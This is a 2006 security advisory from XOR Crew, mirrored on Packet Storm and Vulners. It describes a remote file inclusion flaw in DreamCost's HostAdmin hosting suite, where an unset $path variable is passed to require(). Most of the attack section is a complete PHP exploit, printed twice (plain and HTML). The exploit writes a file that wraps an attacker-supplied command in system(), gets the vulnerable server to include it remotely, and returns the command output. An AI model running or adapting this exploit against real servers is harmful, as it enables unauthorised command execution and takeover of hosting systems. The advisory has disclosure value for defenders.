Lucene search
K

XOR-HostAdmin.txt

🗓️ 20 Feb 2006 00:00:00Reported by xorcrew.netType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

HostAdmin - Remote Command Execution Vulnerability in HostAdmin Automated Hosting Suite by DreamCost with potential exploit cod

Code
`------=_Part_3553_5345776.1140054808635  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
XOR Crew :: Security Advisory =20  
2/11/2006  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
HostAdmin - Remote Command Execution Vulnerability  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
http://www.xorcrew.net/  
http://www.xorcrew.net/ReZEN  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
:: Summary  
  
Vendor : DreamCost  
Vendor Site : http://www.dreamcost.com/  
Product(s) : HostAdmin - Automated Hosting Suite  
Version(s) : All  
Severity : Medium/High  
Impact : Remote Command Execution  
Release Date : 2/11/2006  
Credits : ReZEN (rezen (a) xorcrew (.) net)  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
I. Description  
  
By creating a product that integrates with the major payment  
processors, registrars,  
and provisioning tools on the market, HostAdmin gives your hosting  
company the power  
to bill and activate hosting accounts in real-time, even while you  
sleep at night!  
  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
II. Synopsis  
  
There is a remote file inclusion vulnerability that allows for remote  
command execution  
in the index.php file. The bug is here on lines 5, 6, and 7:  
  
require("setup.php");  
require("functions.php");  
require("db.conf");  
require($path . "que.php");  
require($path . "provisioning_manager.php");  
require($path . "registrar_manager.php");  
  
the $path variable is not set prior to being used in the require() function=  
.  
The vendor is no longer offering updates for this software.  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Exploit code:  
  
-----BEGIN-----  
  
<?php  
/*  
HostAdmin Remote File Inclusion Exploit c0ded by ReZEN  
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf  
url: http://www.xorcrew.net/ReZEN  
*/  
  
$cmd =3D $_POST["cmd"];  
$turl =3D $_POST["turl"];  
$hurl =3D $_POST["hurl"];  
  
$form=3D "<form method=3D\"post\" action=3D\"".$PHP_SELF."\">"  
."turl:<br><input type=3D\"text\" name=3D\"turl\" size=3D\"90\"  
value=3D\"".$turl."\"><br>"  
."hurl:<br><input type=3D\"text\" name=3D\"hurl\" size=3D\"90\"  
value=3D\"".$hurl."\"><br>"  
."cmd:<br><input type=3D\"text\" name=3D\"cmd\" size=3D\"90\"  
value=3D\"".$cmd."\"><br>"  
."<input type=3D\"submit\" value=3D\"Submit\" name=3D\"submit\">"  
."</form><HR WIDTH=3D\"650\" ALIGN=3D\"LEFT\">";  
  
if (!isset($_POST['submit']))  
{  
  
echo $form;  
  
}else{  
  
$file =3D fopen ("test.txt", "w+");  
  
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");  
system(\"echo ++END++\"); ?>");  
fclose($file);  
  
$file =3D fopen ($turl.$hurl, "r");  
if (!$file) {  
echo "<p>Unable to get output.\n";  
exit;  
}  
  
echo $form;  
  
while (!feof ($file)) {  
$line .=3D fgets ($file, 1024)."<br>";  
}  
$tpos1 =3D strpos($line, "++BEGIN++");  
$tpos2 =3D strpos($line, "++END++");  
$tpos1 =3D $tpos1+strlen("++BEGIN++");  
$tpos2 =3D $tpos2-$tpos1;  
$output =3D substr($line, $tpos1, $tpos2);  
echo $output;  
  
}  
?>  
  
  
------END------  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
IV. Greets :>  
  
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.  
  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
------=_Part_3553_5345776.1140054808635  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<pre>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>XOR Crew :: Security Advisory=  
2/11/2006<br>=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D  
<br>HostAdmin - Remote Command Execution Vulnerability<br>=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D<br><a href=3D"http://www.xorcrew.net/">http://www.xor=  
crew.net/</a><br><a href=3D"http://www.xorcrew.net/ReZEN">  
http://www.xorcrew.net/ReZEN</a><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br=  
><br>:: Summary<br><br> Vendor : DreamCost<br> Vendor Site=  
: <a href=3D"http://www.dreamcost.com/">  
http://www.dreamcost.com/</a><br> Product(s) : HostAdmin - Automate=  
d Hosting Suite<br> Version(s) : All<br> Severity : Mediu=  
m/High<br> Impact : Remote Command Execution<br> Release D=  
ate : 2/11/2006  
<br> Credits : ReZEN (rezen (a) xorcrew (.) net)<br><br>=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>I. Description<br><br>By creating a p=  
roduct that integrates with the major payment processors, registrars,=20  
<br>and provisioning tools on the market, HostAdmin gives your hosting comp=  
any the power <br>to bill and activate hosting accounts in real-time, even =  
while you sleep at night!<br><br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
<br><br>II. Synopsis<br><br>There is a remote file inclusion vulnerability =  
that allows for remote command execution<br>in the index.php file. The bug=  
is here on lines 5, 6, and 7: <br><br>require("setup.php");<br>  
require("functions.php");<br>require("db.conf");<br>req=  
uire($path . "que.php");<br>require($path . "provisioning_ma=  
nager.php");<br>require($path . "registrar_manager.php");  
<br><br>the $path variable is not set prior to being used in the require() =  
function.<br>The vendor is no longer offering updates for this software.<br=  
><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
<br><br>Exploit code:<br><br>-----BEGIN-----<br><br><?php<br>/*<br>HostA=  
dmin Remote File Inclusion Exploit c0ded by ReZEN<br>Sh0uts: <a href=3D"htt=  
p://xorcrew.net">xorcrew.net</a>, ajax, gml, #subterrain, My gf<br>url: =20  
<a href=3D"http://www.xorcrew.net/ReZEN">http://www.xorcrew.net/ReZEN</a><b=  
r>*/<br><br>$cmd =3D $_POST["cmd"];<br>$turl =3D $_POST["tur=  
l"];<br>$hurl =3D $_POST["hurl"];<br><br>$form=3D "<=  
form method=3D\"post\" action=3D\"".$PHP_SELF."\&q=  
uot;>"  
<br> ."turl:<br><input type=3D\"text\" name=3D\&=  
quot;turl\" size=3D\"90\" value=3D\"".$turl."=  
\"><br>"<br> ."hurl:<br><input type=3D\=  
"text\" name=3D\"hurl\" size=3D\"90\" value=  
=3D\"".$hurl."\"><br>"  
<br> ."cmd:<br><input type=3D\"text\" name=3D\&q=  
uot;cmd\" size=3D\"90\" value=3D\"".$cmd."\&q=  
uot;><br>"<br> ."<input type=3D\"submit\&quot=  
; value=3D\"Submit\" name=3D\"submit\">"  
<br> ."</form><HR WIDTH=3D\"650\" ALIGN=3D\&quot=  
;LEFT\">";<br><br>if (!isset($_POST['submit'])) <br>{<br><br>e=  
cho $form;<br><br>}else{<br><br>$file =3D fopen ("test.txt", &quo=  
t;w+");  
<br><br>fwrite($file, "<?php system(\"echo ++BEGIN++\"); =  
system(\"".$cmd."\"); <br>system(\"echo ++END++\&q=  
uot;); ?>");<br>fclose($file);<br><br>$file =3D fopen ($turl.$hurl,=  
"r");  
<br>if (!$file) {<br> echo "<p>Unable to get output.\n";=  
<br> exit;<br>}<br><br>echo $form;<br><br>while (!feof ($file)) {<br> =  
$line .=3D fgets ($file, 1024)."<br>";<br> }<br>$tpos1 =  
=3D strpos($line, "++BEGIN++");  
<br>$tpos2 =3D strpos($line, "++END++");<br>$tpos1 =3D $tpos1+str=  
len("++BEGIN++");<br>$tpos2 =3D $tpos2-$tpos1;<br>$output =3D sub=  
str($line, $tpos1, $tpos2);<br>echo $output;<br><br>}<br>?><br><br><br>-=  
-----END------  
<br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>IV. Greets :><br><b=  
r>All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend=  
.<br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
</pre>  
  
------=_Part_3553_5345776.1140054808635--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
29